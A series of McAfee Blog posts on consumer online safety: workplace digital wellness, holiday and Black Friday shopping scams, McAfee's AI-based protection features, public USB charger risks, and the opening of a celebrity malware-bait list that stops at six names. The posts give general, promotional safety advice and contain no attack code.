This is the first in a series of three articles covering digital wellness programs in the workplace. Here we take a broad look at today’s online trends — and reveal why digital wellness is now just as vital as physical, mental, and financial wellness programs. 

What once got done in person, now gets done online. And at historic levels. There’s no question that the pandemic transformed face-to-face interactions into face-to-screen interactions. Not to mention that it ushered in the advent of remote work on a massive scale. Yet even with the pandemic behind us and people largely returning to their places of work, that transformation remains squarely in place.  

Today, we conduct more of our lives online than ever before. That makes protecting life online more important than ever before.  

Yet in a time of data breaches, identity theft, and online scams of all stripes, online protection can seem complicated. That’s why employees welcome digital wellness as a benefit. It can help them fix weak spots in their security, protect their privacy, and put them in control of their personal data.  

Simply put, employees welcome the help. 

Our research with Statista found that 54% of employees worldwide said that online protection is an important or very important benefit. That should come as no surprise, particularly as we take care of increasingly important things online.  

The internet? We’re more reliant on it than ever. 

What does that look like?  

First, we can look at how we bank and shop online. Projections estimate that more than 3.5 billion people worldwide will bank online by 2024, driven in large part by online-only banks. Global e-commerce sales continue to climb with revenues topping more than $5.7 trillion in U.S. dollars. That growth continues at an estimated compound annual growth rate (CAGR) of 11.34%. 

And that’s just for starters. 

Increasingly, we track our health and wellness with connected devices too — like workouts on our phones and biometrics on wearable devices. Worldwide, people own more than a billion wearable connected devices. Taking that a step further, we visit the doctor online now as well. The old-fashioned house call has become the modern-day Zoom call. Our recent research found that 75% of people surveyed in early 2023 said they’ve used telehealth services in the past year. 

In all, we trust the internet with some of our most important tasks. We even trust our homes to it. More than 300 million households run their day with the assistance of smart devices, like smart speakers, smart appliances, and smart deadbolt locks. 

Finally, we can point to the complicated factor of remote and hybrid work. Our joint research with HR.com found that 98% of organizations surveyed have at least one or more employees who work remotely. Additional research cited by Forbes indicates that nearly 13% of full-time employees work remotely, while more than 28% work in a hybrid model. As a result, work devices inevitably get used for some personal purposes — just as personal devices get used for some professional purposes.  

That adds up to an average of nearly seven hours a day spent online.  

It’s little wonder that so many companies continue to show growing interest in digital wellness programs. People find themselves exposed to plenty of risk as they conduct personal business and professional business across the devices they use throughout the day.  

However, what makes up digital wellness and what it offers remains loosely defined. 

The advent of digital wellness in the workplace 

Where do digital wellness programs stand in the workplace today? They share much with the state of financial wellness programs about ten years ago. 

At the time, financial wellness was largely unknown. Further, companies were unsure if or how it played a part underneath the umbrella of “wellbeing.” Then changes came along. People saw how financial activities and planning can have a major impact on a person’s quality of life. Today, financial wellness is just as concrete as physical and mental wellness as benefits in the workplace. 

Digital wellness now finds itself in the same evolution cycle that financial wellness entered a decade ago. It’s a concrete pillar underneath “wellbeing” much for the same reasons financial wellness is. Digital wellness reduces stress from loss or the unknown and enables richer, safer, and happier lives. 

With that, today’s threats have evolved as well. While viruses and malware remain a problem, today’s bad actors are out for bigger games. Like stealing personal and financial info for identity theft. Or grifting detailed info from data brokers who compile and sell data linked to millions of people — with up to thousands of entries for each person. 

We’ve also seen the onset of artificial intelligence (AI) in attacks. Fraudsters have used AI as the capstone of convincing voice, image, and video scams. Hackers now generate malware code using AI tools as well. Combine that with the multitude of ways people spend their time online, it’s clear why today’s online crooks tamper with people’s data, privacy, and identity at unprecedented rates.  

HR professionals at organizations are aware of this. Given this climate, 55% of HR professionals said they provide it as part of their organization’s core benefits offerings. Another 36% say it’s part of their organization’s voluntary benefits offerings. Yet their offerings vary greatly. 

Our research respondents said that they have five different digital wellness initiatives on average. Yet we found little consistency between them. Only 60% of respondents provided the same initiatives. The top responses: antivirus software, personal data cleanup, protection for work devices, and instruction on digital best practices. This illustrates that digital wellness programs are indeed in those early stages of development.  

What does digital wellness truly entail? 

Digital wellness protects the person. This definition provides the basis for any comprehensive digital wellness offering. 

More than offering antivirus or a VPN as a benefit, digital wellness protects the lives that employees live online. It helps prevent the things that can absolutely upend a person’s life online, like hacks, malware attacks, and online scams. And if someone falls victim to a data breach or identity theft, it provides a clear path forward with restorative measures. 

People simply want to enjoy their time online without worrying about the risks. Yet if not looked after, gaps in their digital wellness can drive huge financial and mental stresses. For example, consider how identity theft steals more than money. It steals time, robbing a victim of their focus on other parts of their home and work lives as they struggle to recover. 

As such, a digital wellness program that provides preventative and restorative measures. Often with comprehensive online protection like ours as a cornerstone offering.  

Yet we can extend the definition further. It can also entail a healthy relationship with the internet. Balancing time spent there with other aspects of life, which can help relieve stress and burnout as well. Respondents in our HR.com research found this aspect of digital wellness appealing. Nearly half said that establishing a healthy relationship with technology is a key aspect of digital wellness — recognizing that this requires ongoing education. 

Building your digital wellness program 

Certainly, a comprehensive and successful digital wellness program protects the whole person, not just their devices.  

For organizations that want to create this kind of digital wellness program, we offer up this series of articles. Our aim is to load you up with insights that can make the business case for putting one in place. You’ll see how employers and employees agree there’s a real need for it — and that everyone stands to benefit. 

Look for our next article in the series. 

Want to learn more? Visit us at https://www.mcafee.com/en-us/resources/digital-wellness.html or reach out to EmployeeBenefits@mcafee.com. 

The post The Benefits of Protection – The Case for Digital Wellness in the Workplace appeared first on McAfee Blog.

This time of year, the air gets chillier and a bit cheerier for everyone … including online scammers. Holiday scams are a quick way to make a buck, and cybercriminals employ several holiday-themed schemes to weasel money and personally identifiable information (PII) from gift-givers and do-gooders.  

Here are five common Black Friday, Cyber Monday, and holiday season shopping scams to watch out for this year, plus a few tips to help you stay safe online. 

5 Common Types of Holiday Season Scams 

1. Fake charities

The holiday season often brings outpourings of generosity, and scammers kick their morals to the curb and use people’s kindness to make a profit. Social engineering is a tactic where a bad actor plays on people’s emotions to trick them into sharing personal or financial information. This holiday season, keep an eye out for strangers’ funding pages or social media posts asking for donations.  

Artificial intelligence (AI) content generation tools like ChatGPT and Bard are likely to make these scams more believable than those in years past. While AI doesn’t understand human emotion, when given the right prompt, it can mimic it well. In one “60 Minutes” segment, Bard wrote a touching short story that made the presenter misty-eyed. Additionally, AI usually uses correct grammar and edits out typos, which used to be the hallmark of phishing attempts. 

There are undoubtedly authentic stories of real people and families in need around the holidays. Be wary of any social media post that makes you feel an extreme emotion, in this case, sadness. Phishers want people to act before they think through their decision. 

2. Last-minute deals

Are you a procrastinator? Watch out for last-minute shopping scams that are targeted at people who leave their gift buying until deep in December. As with anything else, if it’s too good to be true, it probably is. Shopping scams often take the form of phishing emails where criminals impersonate a well-known merchant.   

While sales often have a quick timeline, don’t let that short timeline pressure you into making an impulsive decision. Phishing emails, when you take the time to inspect them, are usually easy to spot. The logos are often blurry and the tone of the message will seem “off.” Either it will sound very formal and impersonal or it will sound very informal and seem pushy. 

3. Phony order confirmations and tracking numbers

During the holiday shopping season, your doorstep can be crowded with packages. Do you remember what’s in each one? Online criminals bank on the fact that you can’t quite keep track of what you’ve purchased. 

Criminals try to lure people to download malware or divulge personal or account information with bogus order confirmation and delivery tracking number emails and texts. They’ll impersonate popular online retailers or postal services and claim to have information about your order if you click on their link; however, that link will redirect to a malicious site or download a malicious payload to your device. 

4. Fake account suspensions and unable-to-deliver notices

This holiday shopping scam also dials in on people who’ve lost track of how many online orders they’ve made and the various shopping accounts in their name. Again, phishers will impersonate popular merchants and send “urgent” messages about suspending online accounts if payment isn’t received immediately. Similarly, phishers may also impersonate delivery services claiming that they’re (basically) holding your orders hostage until you pay up.  

5. Gift card cracking

Gift cards are a standby present for the people on your list who are difficult to buy for or for people you don’t know too well but want to get them a small something. Whether the gift card is worth $5 or $500, an online scammer can steal the entire value through two techniques: a brute force attack or phishing. Known as gift card cracking, cybercriminals can take wild guesses at gift card codes and cash in the value for themselves by methodically guessing strings of numbers and letters and crossing their fingers for a match. Cybercriminals will also employ phishing emails, texts, or social media direct messages to trick people into divulging gift card information. 

How to Stay Safe This Black Friday and Cyber Monday 

Luckily, there are several ways to sniff out a bad actor trying to cash in on your holiday spirit. Here are a few simple ways you can modify your online holiday shopping habits to keep your devices free from malware and your PII out of the hands of bad actors. 

• Use a VPN. A virtual private network (VPN) scrambles all your outgoing data, making it nearly impossible for a cybercriminal to snoop on your online activities. Connecting to a VPN is especially crucial when you’re online shopping and using a public or unsecure wi-fi network. 

• Lock your credit. This is a great tip that you can easily do all year long! Locking your credit means that no one (that includes you!) can open a new credit line in your name. If someone gets ahold of your PII and tries to impersonate you to apply for a loan or a credit card, a credit lock will instantly deny their application. 

• Browse intelligently. Stick to websites and well-trusted brands that you’ve heard of. Just because a company advertises on social media doesn’t mean that it’s reputable. Before you click on any links to a “deal” sent to you via email or text, hover over the link to see where the URL takes you. If it’s a long URL that redirects to a website with a typo or somewhere completely different than what you’d expect, approach with caution. An “https” at the beginning of the URL doesn’t necessarily mean that the site is secure, but it’s a good indicator that it may be ok to proceed. If a deal seems too good to be true, move along. While your wallet may ache, compromising your device, identity, or online privacy isn’t worth the risk.

• Remain skeptical and do your research. If a charity or a stranger online asking for donations touches your heart, take a break for a few hours to think about your contribution. While you’re considering, do some background research on the cause. A reputable organization will have a website, an accreditation, and will let you know how they will put your contribution to good use. Be especially on guard if anyone asks for wire transfers or gift cards as a donation. 

• Redeem gift cards early. Encourage your loved ones to redeem their gift card quickly to shorten the amount of time a scammer has to guess the code correctly. Or, you could opt for a paper gift certificate from a small business that doesn’t require online redeeming at all. To avoid gift card phishing scams, do not engage with any type of correspondence that claims they can double the value of your gift card or claims that there’s a problem with it. Be instantly on alert if anyone asks for the activation code. If the gift card-issuing business really needs to replace your purchase, they’ll issue you a new code. They’ll never ask for your existing one. 

Online, Identity and Device Protection for All Seasons 

Cybercriminals hustle all year round, so it’s an excellent idea to invest in a security solution that gives you peace and mind and boosts your confidence in your privacy, identity, and device safety. McAfee+ is an excellent partner! It includes a VPN, safe browsing tool, credit lock, identity monitoring and remediation, and much more. 

Happy shopping, happy holidays, and happy new year! 

The post ’Tis the Season for Holiday Scams: 5 Common Schemes to Look Out For appeared first on McAfee Blog.

AI is on your side. In fact, it’s kept you safer online for some time now. 

Now that scammers and hackers have gotten their hands on AI tools, they understandably get their share of headlines. Rightfully so. AI tools have helped them scale up their attacks while also making them look and feel increasingly sophisticated.  

Meanwhile, at McAfee, we’ve used AI as a core component of our protection for years now. As such, it’s done plenty for you over the years. AI has sniffed out viruses, malicious websites, and sketchy content online. It’s helped steer you clear of malicious websites too.  

Now we’ve made improvements to our AI-driven protection—and unveiled an all-new feature that takes full advantage of AI, McAfee Scam Protection. 

AI is indeed on your side. A quick tour will show you how. 

How AI keeps you safe: The plain language version. 

AI-driven protection quashes threats in three ways: 

1. It detects threats by referencing models of existing threats. This combats pre-existing threats and entirely new (zero-day) threats alike. AI can spot varieties of different threats by comparing them to features it’s seen before. For example, it’s like AI learning to identify different varieties of fruit. An apple is still an apple whether it’s a Fuji or Granny Smith. In that way, a virus is still a virus if it’s “Virus A” or the newly discovered “Virus Z.” 

1. It further detects suspicious events and behaviors. AI provides a particularly powerful tool against zero-day threats. It analyzes the activities of applications for patterns that are consistent with malicious behavior. With that it can spot and prevent a previously unknown file or process from doing harm. In its way, AI says, “I’ve seen this sketchy behavior before. I’m going to flag it.” 

1. It automatically classifies threats and adds them to its body of knowledge. AI-driven threat protection gets stronger over time. Because it learns. Something we call “threat intelligence.” The more threats it encounters, the more rapidly and readily it can determine if files want to do you no good. The body of threat intelligence improves immensely as a result. 

So, what does AI-driven protection look like in the real world?  

AI can identify malicious websites and links before you can connect to them. It can prevent new forms of ransomware from encrypting your photos and files. And it can let you know when the link you got in that text is a total fake.  

In combination with our security engineers and teams, AI really on your side.  

AI leads to powerful new protections. 

As part of our product launch a few weeks ago, we created advances in one or our AI-driven protections and released an entirely new AI-driven protection as well. 

McAfee Next-gen Threat Protection: McAfee’s AI-powered security just got faster and stronger. Our Next-gen Threat Protection takes up less disk space, reduces its background processes by 75%, and scans 3x faster than before. This makes your time online safer without slowing down your browsing, shopping, streaming, and gaming.  

As for strength, it offers 100% protection against zero-day threats and 100% against threats released in the past month (AV-TEST results, June 2023). You’ll find it across all our products that have antivirus included. 

McAfee Scam Protection: McAfee’s patented and powerful AI technology helps you stay safer amidst the rise in phishing scams. Including phishing scams generated by AI. It detects suspicious URLs in texts before they’re opened or clicked on. No more guessing if that text you just got is real or fake. 

And if you accidentally click on a suspicious link in a text, email, social media, or browser search, it blocks the scam site from loading. You’ll find McAfee Scam Protection across our McAfee+ plans. 

Above and beyond AI, more protections for your privacy and identity. 

In addition to AI-driven improvements, we also released several new features. Together they help you protect your privacy, lock down your identity, and set up your McAfee software for the best security. 

• Online Account Cleanup helps reduce the likelihood of being impacted by a data breach—because you have fewer accounts that can get hacked. Many internet users can have over 350 online accounts, many of which they might not know are still active. This feature runs monthly scans to find your online accounts and shows you their risk level to help you decide which to delete, and how to do so.​ 

• Social Privacy Manager helps safeguard your privacy on social media with personalized privacy recommendations based on your own preferences. It does the heavy lifting by adjusting more than 100 privacy settings across your social media accounts in just a few clicks. This ensures your personal info is only visible to the people you want to share it with. 

• Transaction Monitoring helps spot unusual transactions which could be a sign of identity theft. Track deposits, withdrawals, and payments across your accounts, all in one place. (Included with McAfee+ Advanced and Ultimate.) 

• Bank Account Takeover Monitoring provides alerts when your personal contact info changes on your banking account. If it wasn’t you, McAfee will guide you so you can take quick action. (Included with McAfee+ Ultimate.) 

• Increased ID Theft Coverage now provides $2 million identity theft coverage, including 401K plans, stolen funds, and incurred expenses for you and your household members. Also includes $25K ransomware coverage. (Included with McAfee+ Ultimate.) 

• McAfee Assist – Protection Setup connects you with one of our experts for a live session. You can call whenever it’s convenient for you to set up your account. No scheduling needed. (Included with McAfee+ Ultimate.) 

The great feeling you get when you have AI in your corner. 

Hackers might be making headlines as they cook up new attacks with AI, yet maybe it’s time to flip the script this once. AI works for you and can keep you safer online. 

Whether hackers try to hit you with ransomware or scammers pepper you with phony messages, AI can help keep you from harm. In conjunction with other advanced features that protect your privacy and identity, AI makes for powerful protection. 

The post Advances in Our Use of AI Keep You Even Safer Online appeared first on McAfee Blog.

It is common knowledge that connecting your devices to public Wi-Fi can expose them to potential malware and other security risks. But have you ever considered the dangers that might be lurking within public USB chargers? In a surprising revelation, researchers at Georgia Tech discovered that public iPhone chargers can be a conduit for malicious apps, posing a significant risk to your data security and privacy.

The Deceptive Dangers of Public iPhone Chargers

Interestingly, the malicious apps resulting from public iPhone chargers do not require any downloads or visits to the app store. These apps are installed on your iPhone via the compromised USB chargers. Once installed, they function like conventional malware, controlling your device and potentially accessing sensitive information such as banking login details. They can even intercept your phone calls and remotely control your device. The distinctive aspect of these threats is their delivery method—through seemingly innocuous iPhone chargers.

Despite these alarming characteristics, the threat posed by these malicious apps is not widely recognized or understood. Many people continue to casually plug their iPhones into public USB ports casually, little knowing the potential danger they expose their devices to. In contrast to the common belief that devices locked with a PIN or passcode are safe, these malicious apps can still infiltrate your iPhone if it is unlocked even for a moment.

→ Dig Deeper: How Safe Is Your Android PIN Code?

The Devious Mechanism of Infecting iPhones

How exactly do these malicious apps find their way into our iPhones? The scheme was demonstrated by researchers from Georgia Tech, who managed to fool Apple’s security team with a dummy Facebook app containing a hidden malware code. Their experiment showed that when an iPhone connected to a compromised charger is unlocked, the faux Facebook app activates, allowing hackers to take control of the device remotely.

These threats, often called “AutoRun” threats, can make calls, view passwords, alter settings, and perform other operations on your device without your knowledge. The alarming thing about them is that they start executing when a corrupted drive is plugged into a device. Clearly, this poses a unique and powerful threat to smartphones, tablets, PCs, and Macs alike. As our dependence on these devices grows, so does the urgency to understand and prevent such attacks.

→ Dig Deeper: Can Apple Macs Get Viruses?

The Extent and Impact of the Threat

Though the AutoRun threat may sound like a plot straight out of a sci-fi movie, it is disturbingly real. This McAfee Threats Report revealed that the prevalence of these attacks doubled in one year and continues to rise. Such an escalation underscores the need for increased awareness and caution concerning our device usage.

While the threat experiment conducted by Georgia Tech researchers was staged, the potential for its execution by cybercriminals is very real. Cybercriminals are always looking for weak spots in security systems, and public USB chargers are proving to be one such vulnerability. This is made worse because not many people are aware of this weakness, making them easy targets for cybercriminals.

McAfee Pro Tip: Stay informed about less conventional threats, such as malware that may lurk in unexpected places like chargers, by exploring the wealth of cyber resources available in McAfee’s extensive collection of resources. Dive into our informative blogs and in-depth reports to expand your awareness and understanding of these unconventional risks.

Apple’s Response and Recommendations

Apple responded promptly to the Georgia Tech experiment and released an update to raise a warning when connecting to unfamiliar USB chargers. However, this warning is often ignored and opens the device to potential threats. So, the safest preventive measure is to avoid using public charging stations.

Moreover, it is advisable not to unlock your devices while charging. Unlocking an iPhone, even momentarily, was key to disseminating the malicious app in the Georgia Tech experiment. If you’ve connected to a public USB charger and want to verify that your device hasn’t been compromised, navigate to Settings > General > Profiles. If you see any unfamiliar names, remove them immediately.

→ Dig Deeper: Protecting the Universal Remote Control of Your Life—Your Smartphone

Further Protective Measures

Public charging stations might seem like a convenient solution, but they come with their own set of risks–malware is one, as mentioned. One of the most practical and secure alternatives to public charging stations is carrying a portable charger, commonly known as a power bank. These devices come in various sizes and capacities, making it easy to find one that suits your needs. Another simple yet effective alternative to public charging stations is to carry your own charging cable. Most people use USB cables that can be connected to power sources like laptops, portable chargers, or even wall outlets.

Along with avoiding public charging stations, it is crucial only to download apps from trusted sources. While the malicious app in the experiment was installed via a compromised charger, caution is still paramount when downloading apps, even over Wi-Fi. Stick to official app stores to lessen the risk of downloading malware-laden apps.

Perhaps the most significant measure to protect against cyber threats is installing comprehensive security on all your devices. A complete solution like McAfee LiveSafe not only protects your devices from the latest forms of malware, spyware, and other viruses and safeguards your identity and valuable data. The ever-evolving tactics of cybercriminals require vigilant and robust security measures.

Final Thoughts

As our reliance on smartphones and other devices grows, so does the sophistication and prevalence of cyber threats. In this high-risk digital era, awareness and caution are the first steps toward protection. The experimental threat posed by public iPhone chargers underscores the hidden dangers we may unknowingly expose ourselves to. By understanding these threats and implementing protective measures, such as using trusted sources for app downloads and comprehensive security software, we can minimize our vulnerability to such attacks. As we continue to live in an increasingly digital world, it is more important than ever to understand potential threats and take steps to protect ourselves and our valuable data.

Safeguarding your devices, especially those that are an integral part of your daily life and constantly require recharging, is paramount in our increasingly interconnected world. McAfee’s cutting-edge software solutions offer a fortified defense against many online perils.

The post US-B Careful: Public iPhone Chargers Lie in Wait appeared first on McAfee Blog.

The eagerly awaited holiday sales such as Black Friday and Cyber Monday are just around the corner. As consumers, we look forward to getting the best deals online, but we’re not the only ones. Hackers are also keenly anticipating these holidays but for different reasons. They use this period to come up with all sorts of shopping scams that can potentially put a dampener on the holiday spirit for unsuspecting shoppers.

This article provides you with ten tips to keep you and your family safe from online shopping scams this season. These tips will not only help you spot a good deal but also help you avoid falling prey to online scams, thereby ensuring that you keep your finances safe during this shopping season.

1. Be Cautious of Email Attachments from Retailers and Shippers

A common tactic employed by hackers involves the use of malware hidden in email attachments. During the holiday sales season, they often camouflage their malware in emails that claim to contain offers or shipping notifications. It is important to remember that legitimate retailers and shipping companies will not send offers, promo codes, or tracking numbers as email attachments. Instead, they will mention these details in the body of the email.

Therefore, be wary of any email attachments you receive from retailers or shippers. If something seems off, it probably is. Do not download or open suspicious attachments, as this could potentially lead to a malware attack.

→ Dig Deeper: McAfee Protects Against Suspicious Email Attachments

2. Thoroughly Review Links and Email Addresses

Scammers often employ a tactic known as “typosquatting,” where they create phony email addresses and URLs that look incredibly similar to the legitimate addresses of well-known companies and retailers. These are often sent via phishing emails, and instead of leading you to great deals, these links can direct you to scam websites that extract your login credentials, payment information, or even directly extract funds from your account when you attempt to place an order through them.

Therefore, it is imperative to double-check all email addresses and URLs before clicking on them. Look out for subtle discrepancies in the spelling or arrangement of characters, as these are often indicators of a scam. If a link or email address seems suspicious, do not click on it.

→ Dig Deeper: How Typosquatting Scams Work

3. Beware of Copycat Deals and Sites

In continuation with the previous point, scammers also set up websites that resemble those run by trusted retailers or brands. These websites often advertise special offers or attractive deals on popular holiday items. However, these are nothing more than a ruse to trick unsuspecting shoppers into divulging their personal and financial information.

These scam websites are often spread through social media, email, and other messaging platforms. It’s crucial to exercise skepticism when encountering such links. Instead of clicking on them, it’s always safer to visit the brand’s official website directly and look for the deal there. 

→ Dig Deeper: 8 Ways to Know If Online Stores Are Safe and Legit

4. Ensure You Have Adequate Protection While Shopping

Using a robust and comprehensive security software suite while shopping can provide you with additional layers of protection against scams. For instance, web browser protection features can block malicious and suspicious links, reducing the risk of falling prey to malware or a financial scam.

Ensure your antivirus software is up to date and your firewall is enabled. At the same time, enable secure browsing options available in your web browser. These simple steps can go a long way in securing your online shopping experience.

5. Diversify and Secure Your Passwords

Using the same passwords across multiple platforms is akin to giving hackers a free pass. If they manage to hack into one account, they can potentially gain access to others that share the same password. To avoid this, consider using a password manager. These tools can generate complex and unique passwords for each of your accounts and store them securely, saving you the hassle of remembering them all.

By diversifying your passwords and securing them effectively, you can significantly reduce the risk of becoming a victim of a hack or a scam. The importance of this proactive approach cannot be overstated in today’s interconnected world, where our personal and financial information is often just a few clicks away from prying eyes and malicious intent.

→ Dig Deeper: Strong Password Ideas to Keep Your Information Safe

6. Utilize Two-Factor Authentication

Two-factor authentication (2FA) is an invaluable tool that adds an extra layer of protection to your accounts. When 2FA is enabled, gaining access to your accounts isn’t as simple as just entering your username and password. Instead, you also need to input a unique, one-time-use code that is typically sent to your phone or email. This code acts as a second password, making your account significantly more secure.

If any of your accounts offer 2FA, it’s crucial to take advantage of this feature. While it might initially seem cumbersome, the added security is well worth the slight inconvenience.

7. Use a VPN When Shopping on Public Wi-Fi

Public Wi-Fi networks, such as those found in coffee shops and other public locations, can be dangerous due to their lack of security. If you shop online through a public Wi-Fi network, you’re essentially broadcasting your private information to anyone who cares to look. To prevent this, consider using a virtual private network (VPN).

VPNs encrypt your internet traffic, securing it against any prying eyes. This encryption protects your passwords, credit card numbers, and other sensitive information from being intercepted and misused. If you frequently shop online in public places, using a VPN is a must.

8. Opt for Credit Cards Over Debit Cards

In the U.S., the Fair Credit Billing Act protects against fraudulent charges on credit cards. Under this act, you can dispute any charges over $50 for goods and services that you never received or were billed incorrectly for. Moreover, many credit card companies offer policies that add to the protections provided by the Fair Credit Billing Act.

However, these protections don’t extend to debit cards. When you use a debit card, the money is immediately drawn from your bank account, making it more difficult to recover in case of fraud. So, for online shopping, it’s safer to use a credit card instead of a debit card.

9. Consider Getting a Virtual Credit Card

A virtual credit card can provide an extra layer of security for your online purchases. When you use one of these cards, it generates a temporary card number for each transaction, keeping your real card number safe. However, there are potential downsides to be aware of, such as difficulties with returns and refunds.

Before deciding to use a virtual credit card, understand its pros and cons. Research the policies of the issuing company so you can make an informed decision about whether or not it’s the right choice for you.

10. Monitor Your Credit Reports Closely

Given the number of accounts most of us manage and the rampant incidents of data breaches, it’s crucial to monitor your credit reports for any signs of fraud. An unexpected change in your credit score could indicate that someone has taken out a loan or credit card in your name. If you notice any discrepancies, report them immediately to the credit bureau and to the lender who reported the fraudulent information.

In the U.S., you’re entitled to a free credit report from each of the three major credit bureaus every year. Utilize this service and check your reports regularly. Remember, quickly identifying and reporting fraudulent activity is the key to mitigating its impact.

McAfee Pro Tip: Have you encountered a suspicious charge on your credit card and felt uncertain about the next steps? Get a credit monitoring service to monitor any unusual credit-related transactions that may be a potential sign of identity theft. 

Final Thoughts

As we approach Cyber Monday, it’s important to stay vigilant to protect yourself and your family from online scams. By taking simple precautions like verifying email addresses, resorting to 2FA, using a VPN while shopping on public Wi-Fi, and monitoring your credit reports, you can significantly reduce your chances of falling for an online shopping scam. Additionally, consider employing cybersecurity solutions like McAfee+, which offer robust protection against various online threats. Remember, if a deal seems too good to be true, it probably is. Happy and safe shopping!

The post Cyber Monday: Protect Yourself and Your Family from Online Shopping Scams appeared first on McAfee Blog.

With the shopping bonanzas of Black Friday and Cyber Monday comes a flurry of deals and offers, some of which are too good to be true. Unfortunately, the latter instances often become scams run by fraudsters seeking to take advantage of the shopping frenzy. In this article, we will discuss some of the most notorious Black Friday and Cyber Monday scams that you should keep an eye out for.

Understanding the Scams

Scammers are skilled manipulators who know how to twist human emotions to their advantage. They create a sense of urgency, fear, or stress, which are heightened during the holiday season rush. As people scramble to get the best deals and hard-to-get items, they often let their guard down, making them easy targets for these fraudsters. Knowing how to identify these scams is the first step to safeguarding yourself from becoming a victim.

Top Online Shopping Scams to Avoid

Whether you’re a seasoned online shopper or just getting started, this guide will help you identify the top online shopping scams today and stay one step ahead to enjoy a safer, more secure shopping experience:

1. The Fake Order Scam

As everyone is hurrying to grab the best deals during the holiday season, keeping track of all the orders can be challenging. Scammers leverage this situation, sending fake order confirmations via email or text. These seemingly legit confirmations often contain malware or phishing links that the scammers use to steal your identity. The best strategy is to track your orders directly from the seller’s website or platform.

2. The Phony Tracking Number Scam

Similar to the fake order scam, fraudsters send fake package tracking notifications as an email attachment or link. Actual retailers will never send tracking numbers via an attachment. Scammers use these tactics to infect your device with malware or direct you to phishing sites. As always, visit the seller’s site to get accurate tracking information for your order.

3. The Bogus Website Scam

Scammers are skilled at creating fake email addresses and URLs that resemble those of legitimate companies. These phishing emails often lead to scam sites that capture your login credentials and payment information. Avoid clicking on email links; it’s safer to type the URL manually and search for deals.

→ Dig Deeper: 7 Ways to Tell If It’s a Fake

4. The Hot Deal Scam

Scarcity is a prime tool for scammers. They create fake websites offering popular items that are generally hard to find. These scams can result in you paying for a product you’ll never receive and the scammer possessing your payment details. The Better Business Bureau provides useful reviews to help verify the legitimacy of a product or seller.

5. The Fake Charity Scam

During the holiday season, there’s a surge in charity donations, and scammers know this trend. They set up bogus charities and employ high-pressure tactics to get you to donate. Be wary of organizations that accept payment only through gift cards, wire transfers, or cryptocurrency. The U.S. Federal Trade Commission (FTC) offers resources to ensure your donations reach legitimate charities.

Avoiding Scams on Black Friday and Cyber Monday

Amidst the whirlwind of savings and special offers, there’s a lurking concern that every savvy shopper should be aware of – scams. Protecting yourself from potential scams during these shopping bonanzas is paramount. Several strategies are available to help you stay one step ahead of potential scammers and ensure a safe and successful shopping experience during Black Friday and Cyber Monday. Here are strategies you can follow:

Stick with known, legitimate retailers online

One of the simplest ways to avoid scammers is to shop from familiar and reputable online retailers. If you’re unsure about a retailer, the U.S. Better Business Bureau provides listings to help you research their reputation.

Look for the lock icon in your browser when you shop

Secure websites start with “https,” with the extra “s” standing for “secure.” You’ll often see a padlock icon in the address bar of your browser. If you don’t see these security indicators, avoid purchasing on that website.

McAfee Pro Tip: When you’re visiting a website, it’s important to keep your radar up for a few essential clues that tell you whether it’s safe or not. Sure, we’ve talked about the ‘https’ thing in the web address, but there are other giveaways, too, like phony icons and symbols, how well the website’s put together, how fast it loads, and a bunch of other stuff. Want to know more about how to check out if a website’s the real deal or not? Check how to tell whether a website is safe.

6. The False Discount Scam

In this scam, fraudsters lure victims with advertisements offering significant discounts on popular products. These advertisements usually contain a link redirecting you to a fraudulent website where your personal and financial information gets stolen. Always cross-check the offered prices with those on the manufacturer’s or well-known retailers’ websites. Also, check if the seller provides complete contact information. A lack of information or a recently registered website should raise a red flag.

7. The Social Media Gift Exchange Scam

During the holiday season, a gift exchange scam often resurfaces on social media. The concept is simple: you buy a gift worth a certain amount, typically $10, and supposedly receive several gifts in return. However, the only person who benefits is the scammer who initiated the scheme. This type of scam is not only deceptive but also illegal. If you encounter such a scheme on social media, report it immediately.

→ Dig Deeper: 6 Tips for Protecting Your Social Media Accounts

8. The Fraudulent Gift Card Scam

Scammers love gift cards! They use emails or text messages to trick you into thinking you’ve received a gift card from a friend or family member. These messages often contain links that, when clicked, install malware on your device or steal your personal information. Always verify the source before clicking on any links. And remember, if a deal sounds too good to be true, it probably is.

9. The Non-existent E-tailer Scam

Beware of new e-commerce sites offering popular items at massive discounts. Scammers often create fake e-commerce sites that vanish after collecting money from their victims. Always research the seller’s reputation before making a purchase. If you can’t find any reviews or feedback about the seller, it’s better to avoid the risk.

→ Dig Deeper: 8 Ways to Know If Online Stores Are Safe and Legit

10. The Smishing Scam

Smishing is a scam where fraudsters send text messages posing as reputable companies to trick individuals into revealing personal information. During the holiday season, these messages often link to a supposed deal or gift. However, the link usually leads to a fraudulent website designed to steal your data. Treat unsolicited print messages with caution, and never click on suspicious links.

Final Thoughts

While the holiday season brings joy and excitement, it also increases online shopping scams. Scammers use a variety of tactics, including fake order confirmations, phony tracking numbers, bogus websites, and nonexistent e-tailers, to trick their victims. To protect yourself, always verify the source before clicking on any links, research sellers before purchasing, and avoid deals that seem too good to be true. By being vigilant and taking precautions, you can safely navigate through the holiday shopping frenzy and prevent yourself from falling victim to these Black Friday and Cyber Monday scams. And, of course, don’t forget to equip your devices with security solutions further to improve your security, privacy, and finances.

The post Black Friday and Cyber Monday Scams: Beware of the Pitfalls appeared first on McAfee Blog.

Hackers love Ryan Gosling. In fact, hackers use his name as bait more than any other celebrity. 

With that, the celebrated star of “Barbie” and umpteen other hit films tops our Hacker Celebrity Hot List for 2023. It’s our annual study that reveals which big-name celebrity searches most often link to malware and risky sites. And this year, we’ve evolved the list. It now includes celebs spotted in deepfake and other AI-driven content. 

With Gosling’s high profile this year, it comes as little surprise that he ranked so highly. As we reported earlier this year, “Barbie” was a huge hit for cybercriminals as well. They baited consumers with a rash of ticket scams, download scams, and other attacks that capitalized on the summer hit’s hype.  

Who made the Hacker Celebrity Hot List? 

Months later, searches for Gosling remain high. His portrayal of Ken has scored him a first-ever Billboard Hot 100 song with “I’m Just Ken.” Meanwhile, Ken and Barbie outfits rank among the most popular Halloween costumes for 2023. 

And if you’re wondering, Margot Robbie, who starred as Barbie to Gosling’s Ken, ranked number eight on our list. The full top ten breaks down as follows: 

1. Ryan Gosling, Golden Globe winner and multiple Academy Award nominee.  
2. Emily Blunt, critically acclaimed actor and star of this summer’s hit film, Oppenheimer. 
3. Jennifer Lopez, pop culture icon, critically acclaimed singer, actor, and producer. 
4. Zendaya, critically acclaimed actor and singer.  
5. Kevin Costner, Academy Award-winning actor and director, and current star of the hit series, Yellowstone. 
6. Elon Musk, business magnate and tech entrepreneur.  
